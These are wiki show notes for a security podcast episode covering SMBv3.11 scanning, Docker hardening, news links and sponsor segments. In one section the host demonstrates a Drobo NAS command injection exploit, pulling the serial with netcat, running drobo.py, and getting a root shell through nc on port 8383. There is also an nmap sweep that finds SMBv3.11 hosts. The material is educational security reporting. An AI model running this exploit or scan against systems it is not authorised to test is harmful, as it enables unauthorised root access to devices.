PSWEpisode644

From Security Weekly Wiki
Revision as of 18:24, 20 March 2020 by Paul Asadoorian (talk | contribs) (Added By Paul's Craptastic PPWorks Code)

Paul's Security Weekly Episode 644 - 2020-03-19

Episode Audio

Paul's Security Weekly Episode 644

Announcements

  • Register for our upcoming webcasts and virtual trainings by visiting securityweekly.com, selecting the webcast/training drop-down from the top menu bar, and clicking registration. In our first virtual training with Online Business Systems you will learn how to generate a complex SHA-256 hashed password and then use password cracking tools to break it. In our next webcast with Gravwell, we will cut through the marketing buzzwords and teach you about collecting & analyzing logs in hybrid cloud environments.
  • CyberSecurity Exchange Day hosted by OSHEAN and the Pell Center was originally scheduled for Wednesday, March 18th and has currently been postponed. The new date is still TBD and we will keep you posted as soon as we hear more!
  • SecureWorld Boston was scheduled for March 25th & 26th at the Hynes Convention Center. The event has been postponed until further notice. We will keep you in the loop as soon as we know more!
  • InfoSecWorld 2020 was originally scheduled for March 30 - April 1, 2020 at the Disney Contemporary Resort! This conference has been rescheduled for June 22nd-24th due to COVID-19. Security Weekly listeners still save 15% off the InfoSec World Main Conference or World Pass! Visit securityweekly.com/ISW2020, click the register button to register with our discount code or the schedule button to sponsor a micro-interview!

News - Drobo Exploit, Docker Escape, SMBv3.11

Microsoft SMBv3.11 Vulnerability and Patch CVE-2020-0796 Explained, Drobo 5N2 4.1.1 - Remote Command Injection, $100K Paid Out for Google Cloud Shell Root Compromise, WordPress, Apache Struts Attract the Most Bug Exploits, Run Docker nginx as Non-Root-User.


Jeff Man's Content:

  1. Endpoint Security: Chain Of Trust Or Chain Of Fools?
  2. There is a Serious Lack of Corporate Responsibility During Breach Disclosures - Ever notice that breached companies always send a letter stating, "We take the security of your data seriously [now]?"
  3. Semafone Bolsters Security Across its Product Line with New PCI DSS Certification - Of course, there's no such thing as PCI DSS Certification...
  4. Five billion records exposed in open ‘data breach database’ - ruh roh
  5. Cyber Attack Results in Defense Contractor Paying $500,000 Ransom



Lee Neely's Content:

  1. Authorities Helpless as Crypto-Currency Scams Rock Nigeria - Beware of scams that offer high return on investment, particularly cryptocurrency. Lack of regulation and oversight make cryptocurrency attractive for this purpose.
  2. Russian Intelligence-Backed Hackers Go After Armenian Government Websites with New Code - FSB-backed Turla group continues to enhance WICHCOVEN & WHIPSNAP codes.

Coronavirus/COVID-19 Related Stories:

  1. State-Sponsored Hackers Are Now Using Coronavirus Lures to Infect Their Targets - Groups from China, North Korea, and Russia are leveraging the COVID-19 crisis as click-bait. Increased diligence and awareness is called for.
  2. SANS Security Awareness Work From Home Deployment Kit
  3. C.S. Lewis on the Coronavirus - s/Atomic Bomb/Coronavirus/g. Relevant advice from 72 years ago.
  4. U.S. tech firms work together to combat virus misinformation - Well intended, and automation is tricky: Facebook was marking legitimate news articles about the coronavirus as spam due to a software bug.
  5. Johns Hopkins Coronavirus map - Use genuine sources for COVID-19 data such as the Johns Hopkins map.

Paul Asadoorian's Content:

  1. SANS Penetration Testing | Microsoft SMBv3.11 Vulnerability and Patch CVE-2020-0796 Explained | SANS Institute
    1. My version: nmap -p445 --open --script smb-protocols -Pn -n 172.16.1.0/24 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | sed -e 's/Nmap scan report for/\n/g; s/\|//g; s/\_//g'
  2. Drobo 5N2 4.1.1 - Remote Command Injection - See below!
  3. Remote Access Bad Stories | /dev/random
  4. Lulzbuster 1.3.2 Packet Storm
  5. Operators behind Nefilim Ransomware threaten to release stolen data - Interesting twist: The ransom note contains emails to contacts for the payment, it also includes the threat of leaking files if the ransom is not paid within seven days.
  6. $100K Paid Out for Google Cloud Shell Root Compromise - This is awesome: After launching a Cloud Shell, the researcher was able to connect to resources, determining that he was “trapped inside a Docker container” because there were only a small number of processes running. He was then able to escape the container and access the full host by examining the file system. "I noticed that there were two Docker UNIX sockets available,” explained ter Maat. “One in ‘/run/docker.sock’, which is the default path for our Docker client running inside the Cloud Shell (Docker inside Docker); the second one in ‘/google/host/var/run/docker.sock.'" This second socket was revealed to be a host-based Docker socket, as indicated by its pathname. "Anyone who can communicate with a host-based Docker socket can easily escape the container and gain root access on the host at the same time,” the researcher noted, adding that he wrote a quick script to do just that. After that, with root access, he was also able to reconfigure Kubernetes to flip all of the containers from unprivileged to privileged by writing a new “cs-6000.yaml” configuration file and setting the old config file to “/dev/null.”
  7. WordPress, Apache Struts Attract the Most Bug Exploits - We have the tools and processes to fix this already, but many organizations don't do it, therefore I somewhat disagree with these statements: “Even if best application development practices are used, framework vulnerabilities can expose organizations to security breaches. Meanwhile, upgrading frameworks can be risky because changes can affect the behavior, appearance or inherent security of applications,” said Srinivas Mukkamala, CEO of RiskSense, in a media statement. “As a result, framework vulnerabilities represent one of the most important, yet poorly understood and often neglected elements of an organization’s attack surface.”
  8. Run Docker nginx as Non-Root-User - By default, nginx runs as root. On a non-Docker system, this is normally not an issue as the master process will run as root and then spawn other processes as a lower privileged user. It is normal to have processes running as root on a non-Docker system, though it should be configured differently; for whatever reason, it is the default. In Docker, this is a problem as it means the container will drop you into root-level privileges by default for a shell (exploit or with docker exec -ti). So, for Docker, make sure you change this as the Docker Hub image for nginx runs as root! They should really change this.
  9. TSA Admits Liquid Ban Is Security Theater - Schneier on Security
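A sturdier form of the grep/sed post-processing in the SMBv3.11 item, added here as an example and not part of the show notes: it parses the same smb-protocols output with awk and reports per host whether dialect 3.11 is offered (the hosts to check for the CVE-2020-0796 patch) and whether SMBv1 is still on. The sample scan output is constructed and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the show notes: a sturdier form of the grep/sed
# pipeline. Reads the normal output of
#   nmap -p445 --open --script smb-protocols -Pn -n NET
# and reports per host whether dialect 3.11 (SMBv3.1.1, check for the
# CVE-2020-0796 patch) is offered and whether SMBv1 is still enabled.
# Assumes -n was used, so the host token is a bare IP address.

smb_dialect_report() {
    awk '
    function emit() {
        if (host != "")
            printf "%s smb3.11=%s smbv1=%s dialects:%s\n", host, (index(dialects, " 3.11") ? "yes" : "no"), v1, dialects
        host = ""; dialects = ""; v1 = "no"
    }
    /^Nmap scan report for/        { emit(); host = $NF; next }
    /^[|]_? +[0-9]+[.][0-9]+ *$/   { dialects = dialects " " $NF; next }
    /SMBv1/                        { v1 = "yes" }
    END                            { emit() }
    '
}

# Only the IPs that speak 3.11, e.g. to feed a patch-verification list.
smb311_hosts() {
    smb_dialect_report | awk '$2 == "smb3.11=yes" { print $1 }'
}

# Constructed sample of nmap output for three hosts (not a real scan).
SAMPLE_SCAN='Nmap scan report for 172.16.1.5
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|     3.02
|_    3.11

Nmap scan report for 172.16.1.20
| smb-protocols:
|   dialects:
|     2.02
|_    3.02

Nmap scan report for 172.16.1.30
| smb-protocols:
|   dialects:
|     3.02
|_    3.11'

printf '%s\n' "$SAMPLE_SCAN" | smb_dialect_report
```

Pipe a live scan in with `nmap -p445 --open --script smb-protocols -Pn -n NET | smb311_hosts` to get just the list of hosts to verify after patching.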
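For the nginx item, one way to run the Docker Hub nginx image as a non-root user, added here as an example (not code from the show notes or from the nginx project). It assumes the nginx:1.17 tag, listens on 8080 because an unprivileged process cannot bind 80, and moves the pid and temp paths under /tmp because the image's default locations are root-owned.

```shell
#!/bin/sh
# Added example, not from the show notes or the nginx project: a build context
# that runs the Docker Hub nginx image as its bundled unprivileged "nginx" user
# instead of root. Assumptions: tag nginx:1.17 (pin your own), port 8080 because
# a non-root process cannot bind 80, and pid/temp paths moved under /tmp since
# the image's /var/cache/nginx and /var/run are root-owned.

write_nginx_conf() {   # $1 = build context directory
    cat > "$1/nginx.conf" <<'EOF'
# No "user" directive: it only applies when the master process runs as root.
worker_processes  1;
pid               /tmp/nginx.pid;
events { worker_connections 1024; }
http {
    include               /etc/nginx/mime.types;
    client_body_temp_path /tmp/client_temp;
    proxy_temp_path       /tmp/proxy_temp;
    fastcgi_temp_path     /tmp/fastcgi_temp;
    uwsgi_temp_path       /tmp/uwsgi_temp;
    scgi_temp_path        /tmp/scgi_temp;
    server {
        listen 8080;
        location / { root /usr/share/nginx/html; }
    }
}
EOF
}

write_dockerfile() {   # $1 = build context directory
    cat > "$1/Dockerfile" <<'EOF'
FROM nginx:1.17
COPY nginx.conf /etc/nginx/nginx.conf
# Everything after this line, including CMD at runtime, runs as the nginx user.
USER nginx
EXPOSE 8080
EOF
}

# Create the context in $1; build and smoke-test only if docker is installed.
# Usage: build_nonroot_nginx ./nginx-nonroot
build_nonroot_nginx() {
    mkdir -p "$1" && write_nginx_conf "$1" && write_dockerfile "$1" || return 1
    command -v docker >/dev/null 2>&1 || return 0
    docker build -t nginx-nonroot "$1" &&
    docker run --rm -d -p 8080:8080 --name nginx-nonroot nginx-nonroot &&
    docker exec nginx-nonroot id    # should not report uid=0(root)
}
```

The `docker exec ... id` at the end is the check the item asks for: a shell in the container (or an exploit in the worker) now lands as the nginx user rather than root.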

Coronavirus/COVID-19 Related Stories:

  1. DDoS attack on US Health agency part of coordinated campaign
  2. Why ransomware continues to knock on healthcare's door, enter, and create havoc - Help Net Security
  3. A cyberattack hits the US Department of Health and Human Services

Drobo Exploit

If you get this error:

paulda@hattori:~/source/drobo$ ./drobo.py 172.16.1.101 partyon
[INFO]: Connecting...
[INFO]: Pulling serial number...
Traceback (most recent call last):
  File "./drobo.py", line 224, in <module>
    m = re.search('<mSerial>([^<]+)</mSerial>', stat_msg.decode('utf-8'))
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd1 in position 15: invalid continuation byte

Get the serial number by hand from the banner on port 5000 (drobo.py fails to decode the status message) and pass it to the script with -s:

$ nc 172.16.1.101 5000
DRINASD�<?xml version="1.0" encoding="utf-8"?>

<ESATMUpdate>
    <mESAUpdateSignature>ESAINFO</mESAUpdateSignature>
    <mESAUpdateVersion>1</mESAUpdateVersion>
    <mESAUpdateSize>29169</mESAUpdateSize>
    <mESAID>SERIALNUMBER</mESAID>
    <mSerial>SERIALNUMBER</mSerial>

Then run commands as follows:

Party On is fun:

$ ./drobo.py -s SERIALNUMBER 10.1.1.10 partyon
[INFO]: Connecting...
[INFO]: Pulling serial number...
[INFO]: Performing handshake...
[INFO]: Sending payload...
[INFO]: Waiting for response...
[INFO]: Response:
<?xml version="1.0" encoding="UTF-8"?>

<TMCmd>
    <CmdID>26</CmdID>
    <Result>8589934592</Result>
    <ResultDetails/>
</TMCmd>

[INFO]: Donezo.

That response is normal. A root shell is fun too:

$ ./drobo.py -s SERIALNUMBER 10.1.1.10 popit
[INFO]: Connecting...
[INFO]: Pulling serial number...
[INFO]: Performing handshake...
[INFO]: Sending payload...
[INFO]: Waiting for response...
[INFO]: Response:
<Error>1</Error>
[INFO]: Donezo.
$ nc 10.1.1.10 8383
��������
/ # id
id
uid=0(root) gid=0(root) context=system_u:system_r:kernel_t:s0


Technical Segment - Work from home securely

Description:

The challenges and differentiated values of desktop and laptop protection and administrative tool control (e.g., Powershell, SSH) for remote users and administrators to work securely.


Guest Bio:
Peter Smith is Founder, CEO at Edgewise
Peter Smith, Edgewise Founder and CEO, is a serial entrepreneur who built and deployed Harvard University's first NAC system before it became a security category. Peter brings a security practitioner's perspective to Edgewise with more than ten years of expertise as an infrastructure and security architect of data centers and customer-hosting environments for Harvard University, Endeca Technologies (Oracle), American Express, Fidelity UK, Bank of America, and Nike.


Jeff Man's Content:

  1. Working from Home: COVID-19’s Constellation of Security Challenges
  2. Microsoft Teams gets off to a wobbly start as the world and its cat starts working from home
  3. Deployment Kit for Securing Your Workforce at Home - Archived, available for download/viewing
  4. 15 Coronavirus Online Scams to Watch Out For



Paul Asadoorian's Content:

How remote users and administrators can work securely during this extended work from home time.

Desktop and Laptop protection
Challenge

  • Malware, threats propagate from desktops to server environment
  • Difficult to separate, for security reasons, development, staging and production environments
  • Managing access policies operationally complex
  • Attackers piggyback on address-based rules


Differentiated Value

  • Application segmentation protects clients and servers associated with the application regardless of where the hosts are located
  • Fully transparent protection, no impact on user experience
  • High performance, extremely low latency



Administrative tool control (e.g., Powershell, SSH)
Challenge

  • Admin tools provide a lot of deep access into the environment
  • Ripe targets for attackers to conduct “living off the land” exploits
  • Blacklist/whitelist approach is not practical when legitimate admin use is required because it is an extremely coarse control (e.g., no ability to allow access only to certain services)


Differentiated Value

  • Prevent download of malicious payloads from the internet by reducing the scope of remote systems (including public internet addresses) that admin tool software can connect to
  • Prevent admin tools from being misused for lateral movement by allowing only administrator clients to connect to client services. Further reduce the risk of lateral movement by preventing admin tools communication between servers
  • Adaptive control that automatically adjusts to legitimate changes in admin tool use
  • Monitor admin tool activity by reviewing logs in Edgewise, or export rich data to SIEM and security monitoring tools via the API


Interview: Zen And The Art Of Logs In The Cloud - 6:00-6:45PM

Description:

Struggling with how to get your logs from the cloud? Have no fear, Corey and the Security Weekly crew talk about how to configure your logs in the cloud, use cloud-native services to handle the shuffling of logs in and out of the cloud, and control your costs! We conclude by talking a bit about Windows Event logs and overcoming some gotchas.

Content:

Visit https://securityweekly.com/gravwell to grab their open-source version and collect and analyze ALL of your logs. Drink all the booze, log all the things.

Guest Bio:
Corey Thuen is Co-Founder at Gravwell
Corey Thuen is a founder of Gravwell and has spent over a decade doing cybersecurity at places like Department of Energy national labs, Digital Bond, and IOActive. That experience is now driving development of a full-stack analytics platform built to alleviate pain points he personally experienced from inflexible tools.

Hosts

Jeff Man - Sr. InfoSec Consultant at Online Business Systems
Larry Pesce - Senior Managing Consultant and Director of Research at InGuardians
Lee Neely - Senior Cyber Analyst at Lawrence Livermore National Laboratory
Paul Asadoorian - Founder & CTO at Security Weekly
Tyler Robinson - Managing Director of Network Operations at Nisos, Inc